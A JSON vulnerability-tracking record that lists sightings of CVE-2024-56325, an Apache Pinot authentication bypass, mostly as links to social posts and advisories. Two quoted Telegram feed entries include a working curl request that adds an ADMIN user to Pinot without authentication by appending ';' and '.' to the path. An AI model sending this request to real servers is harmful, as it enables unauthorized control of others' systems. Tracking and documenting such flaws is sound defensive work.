{"vulnerability": "CVE-2024-56325", "sightings": [{"uuid": "47559415-ee1d-43d3-853f-33019e8b21be", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-56325", "type": "seen", "source": "https://bsky.app/profile/infosec.skyfleet.blue/post/3llex5sozja2r", "content": "", "creation_timestamp": "2025-03-27T18:39:53.177535Z"}, {"uuid": "5960382b-7195-4d20-8c08-94454ce7e6e6", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-56325", "type": "seen", "source": "http://www.zerodayinitiative.com/advisories/ZDI-25-109/", "content": "", "creation_timestamp": "2025-03-03T05:00:00.000000Z"}, {"uuid": "0cb2dc2b-af99-48a1-944d-35c401d5c014", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "cve-2024-56325", "type": "seen", "source": "https://bsky.app/profile/shiojiri.com/post/3lk3kczpmgc27", "content": "", "creation_timestamp": "2025-03-11T07:31:00.897315Z"}, {"uuid": "f9e6cb66-24f4-475b-aeae-2229fc41406e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-56325", "type": "seen", "source": "https://bsky.app/profile/securitylab-jp.bsky.social/post/3llnjekyxh226", "content": "", "creation_timestamp": "2025-03-31T04:27:09.066261Z"}, {"uuid": "0d84828d-a8fd-4e58-9672-90dc7fded24c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-56325", "type": "seen", "source": "https://bsky.app/profile/dinosn.bsky.social/post/3lk34egd5mc2w", "content": "", "creation_timestamp": "2025-03-11T03:21:18.175758Z"}, {"uuid": "000e5b73-4d87-49e9-ae82-2f4dc7ef1bac", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-56325", "type": "seen", "source": "https://infosec.exchange/users/vuldb/statuses/114103812642418026", "content": "", "creation_timestamp": "2025-03-04T11:00:09.277985Z"}, {"uuid": "0af93022-602d-4194-baa4-fcf4f815f964", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-56325", "type": "seen", "source": "https://bsky.app/profile/2rZiKKbOU3nTafniR2qMMSE0gwZ.activitypub.awakari.com.ap.brid.gy/post/3lk3qrtl7nar2", "content": "", "creation_timestamp": "2025-03-11T09:27:39.526456Z"}, {"uuid": "29ac1eb7-2b88-41a1-8efc-f015a6aa32e8", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-56325", "type": "seen", "source": "https://bsky.app/profile/beikokucyber.bsky.social/post/3llzctfed6c2p", "content": "", "creation_timestamp": "2025-04-04T21:02:08.920503Z"}, {"uuid": "8600f9a0-5348-4dc9-9e62-799120b397db", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-56325", "type": "seen", "source": "https://infosec.exchange/users/cR0w/statuses/114262869101590683", "content": "", "creation_timestamp": "2025-04-01T13:10:18.096768Z"}, {"uuid": "b2e2ba76-6802-4a18-a413-6faa89877407", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-56325", "type": "seen", "source": "https://infosec.exchange/users/cR0w/statuses/114262869101590683", "content": "", "creation_timestamp": "2025-04-01T13:10:18.093633Z"}, {"uuid": "275142f2-e952-4d74-b6f8-e654b030b37d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-56325", "type": "confirmed", "source": "https://github.com/projectdiscovery/nuclei-templates/tree/main/http/cves/2024/CVE-2024-56325.yaml", "content": "", "creation_timestamp": "2025-04-03T13:16:13.000000Z"}, {"uuid": "42cbeb12-b2ef-47de-ab3d-8b8fb1197ede", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "c933734a-9be8-4142-889e-26e95c752803", "vulnerability": "CVE-2024-56325", "type": "seen", "source": "https://vulnerability.circl.lu/comment/a9f2cad3-dbfc-4703-9c5f-9af054301f88", "content": "", "creation_timestamp": "2025-03-11T05:25:53.938762Z"}, {"uuid": "94efbc0d-c553-48db-ae2f-2a8618c262d8", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-56325", "type": "seen", "source": "https://bsky.app/profile/getpokemon7.bsky.social/post/3lmif532gvs2p", "content": "", "creation_timestamp": "2025-04-10T20:53:12.140118Z"}, {"uuid": "a3537656-601a-4f5b-af48-b26dd41d6919", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-56325", "type": "seen", "source": "https://bsky.app/profile/getpokemon7.bsky.social/post/3lmlupxwjxk24", "content": "", "creation_timestamp": "2025-04-12T06:10:15.134152Z"}, {"uuid": "a92eca59-6eb9-41cf-b2fa-a9d543047228", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-56325", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/9868", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2024-56325\n\ud83d\udd25 CVSS Score: N/A\n\ud83d\udd39 Description: Authentication Bypass Issue\n\nIf the path does not contain / and contain., authentication is not required.\n\nExpected Normal Request and Response Example\n\ncurl -X POST -H \"Content-Type: application/json\" -d {\\\"username\\\":\\\"hack2\\\",\\\"password\\\":\\\"hack\\\",\\\"component\\\":\\\"CONTROLLER\\\",\\\"role\\\":\\\"ADMIN\\\",\\\"tables\\\":[],\\\"permissions\\\":[],\\\"usernameWithComponent\\\":\\\"hack_CONTROLLER\\\"}  http://{server_ip}:9000/users \n\n\nReturn: {\"code\":401,\"error\":\"HTTP 401 Unauthorized\"}\n\n\nMalicious Request and Response Example \n\ncurl -X POST -H \"Content-Type: application/json\" -d '{\\\"username\\\":\\\"hack\\\",\\\"password\\\":\\\"hack\\\",\\\"component\\\":\\\"CONTROLLER\\\",\\\"role\\\":\\\"ADMIN\\\",\\\"tables\\\":[],\\\"permissions\\\":[],\\\"usernameWithComponent\\\":\\\"hack_CONTROLLER\\\"}'  http://{serverip}:9000/users; http://{serverip}:9000/users; .\n\n\nReturn: {\"users\":{}}\n\n\n\n \n\nA new user gets added bypassing authentication, enabling the user to control Pinot.\n\ud83d\udccf Published: 2025-04-01T09:07:14.185Z\n\ud83d\udccf Modified: 2025-04-01T09:07:14.185Z\n\ud83d\udd17 References:\n1. https://lists.apache.org/thread/ksf8qsndr1h66otkbjz2wrzsbw992r8v", "creation_timestamp": "2025-04-01T09:32:42.000000Z"}, {"uuid": "81c2a461-a786-4c8a-b3ff-76797cc36071", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-56325", "type": "published-proof-of-concept", "source": "https://t.me/cvedetector/21746", "content": "{\n  \"Source\": \"CVE FEED\",\n  \"Title\": \"CVE-2024-56325 - Apache Pinot Authentication Bypass\", \n  \"Content\": \"CVE ID : CVE-2024-56325 \nPublished : April 1, 2025, 9:15 a.m. | 2\u00a0hours, 12\u00a0minutes ago \nDescription : Authentication Bypass Issue  \n  \nIf the path does not contain / and contain., authentication is not required.  \n  \nExpected Normal Request and Response Example  \n  \ncurl -X POST -H \"Content-Type: application/json\" -d {\"username\":\"hack2\",\"password\":\"hack\",\"component\":\"CONTROLLER\",\"role\":\"ADMIN\",\"tables\":[],\"permissions\":[],\"usernameWithComponent\":\"hack_CONTROLLER\"}  http://{server_ip}:9000/users   \n  \n  \nReturn: {\"code\":401,\"error\":\"HTTP 401 Unauthorized\"}  \n  \n  \nMalicious Request and Response Example   \n  \ncurl -X POST -H \"Content-Type: application/json\" -d '{\"username\":\"hack\",\"password\":\"hack\",\"component\":\"CONTROLLER\",\"role\":\"ADMIN\",\"tables\":[],\"permissions\":[],\"usernameWithComponent\":\"hack_CONTROLLER\"}'  http://{serverip}:9000/users; http://{serverip}:9000/users; .  \n  \n  \nReturn: {\"users\":{}}  \n  \n  \n  \n   \n  \nA new user gets added bypassing authentication, enabling the user to control Pinot. \nSeverity: 0.0 | NA \nVisit the link for more details, such as CVSS details, affected products, timeline, and more...\",\n  \"Detection Date\": \"01 Apr 2025\",\n  \"Type\": \"Vulnerability\"\n}\n\ud83d\udd39 t.me/cvedetector \ud83d\udd39", "creation_timestamp": "2025-04-01T13:37:52.000000Z"}]}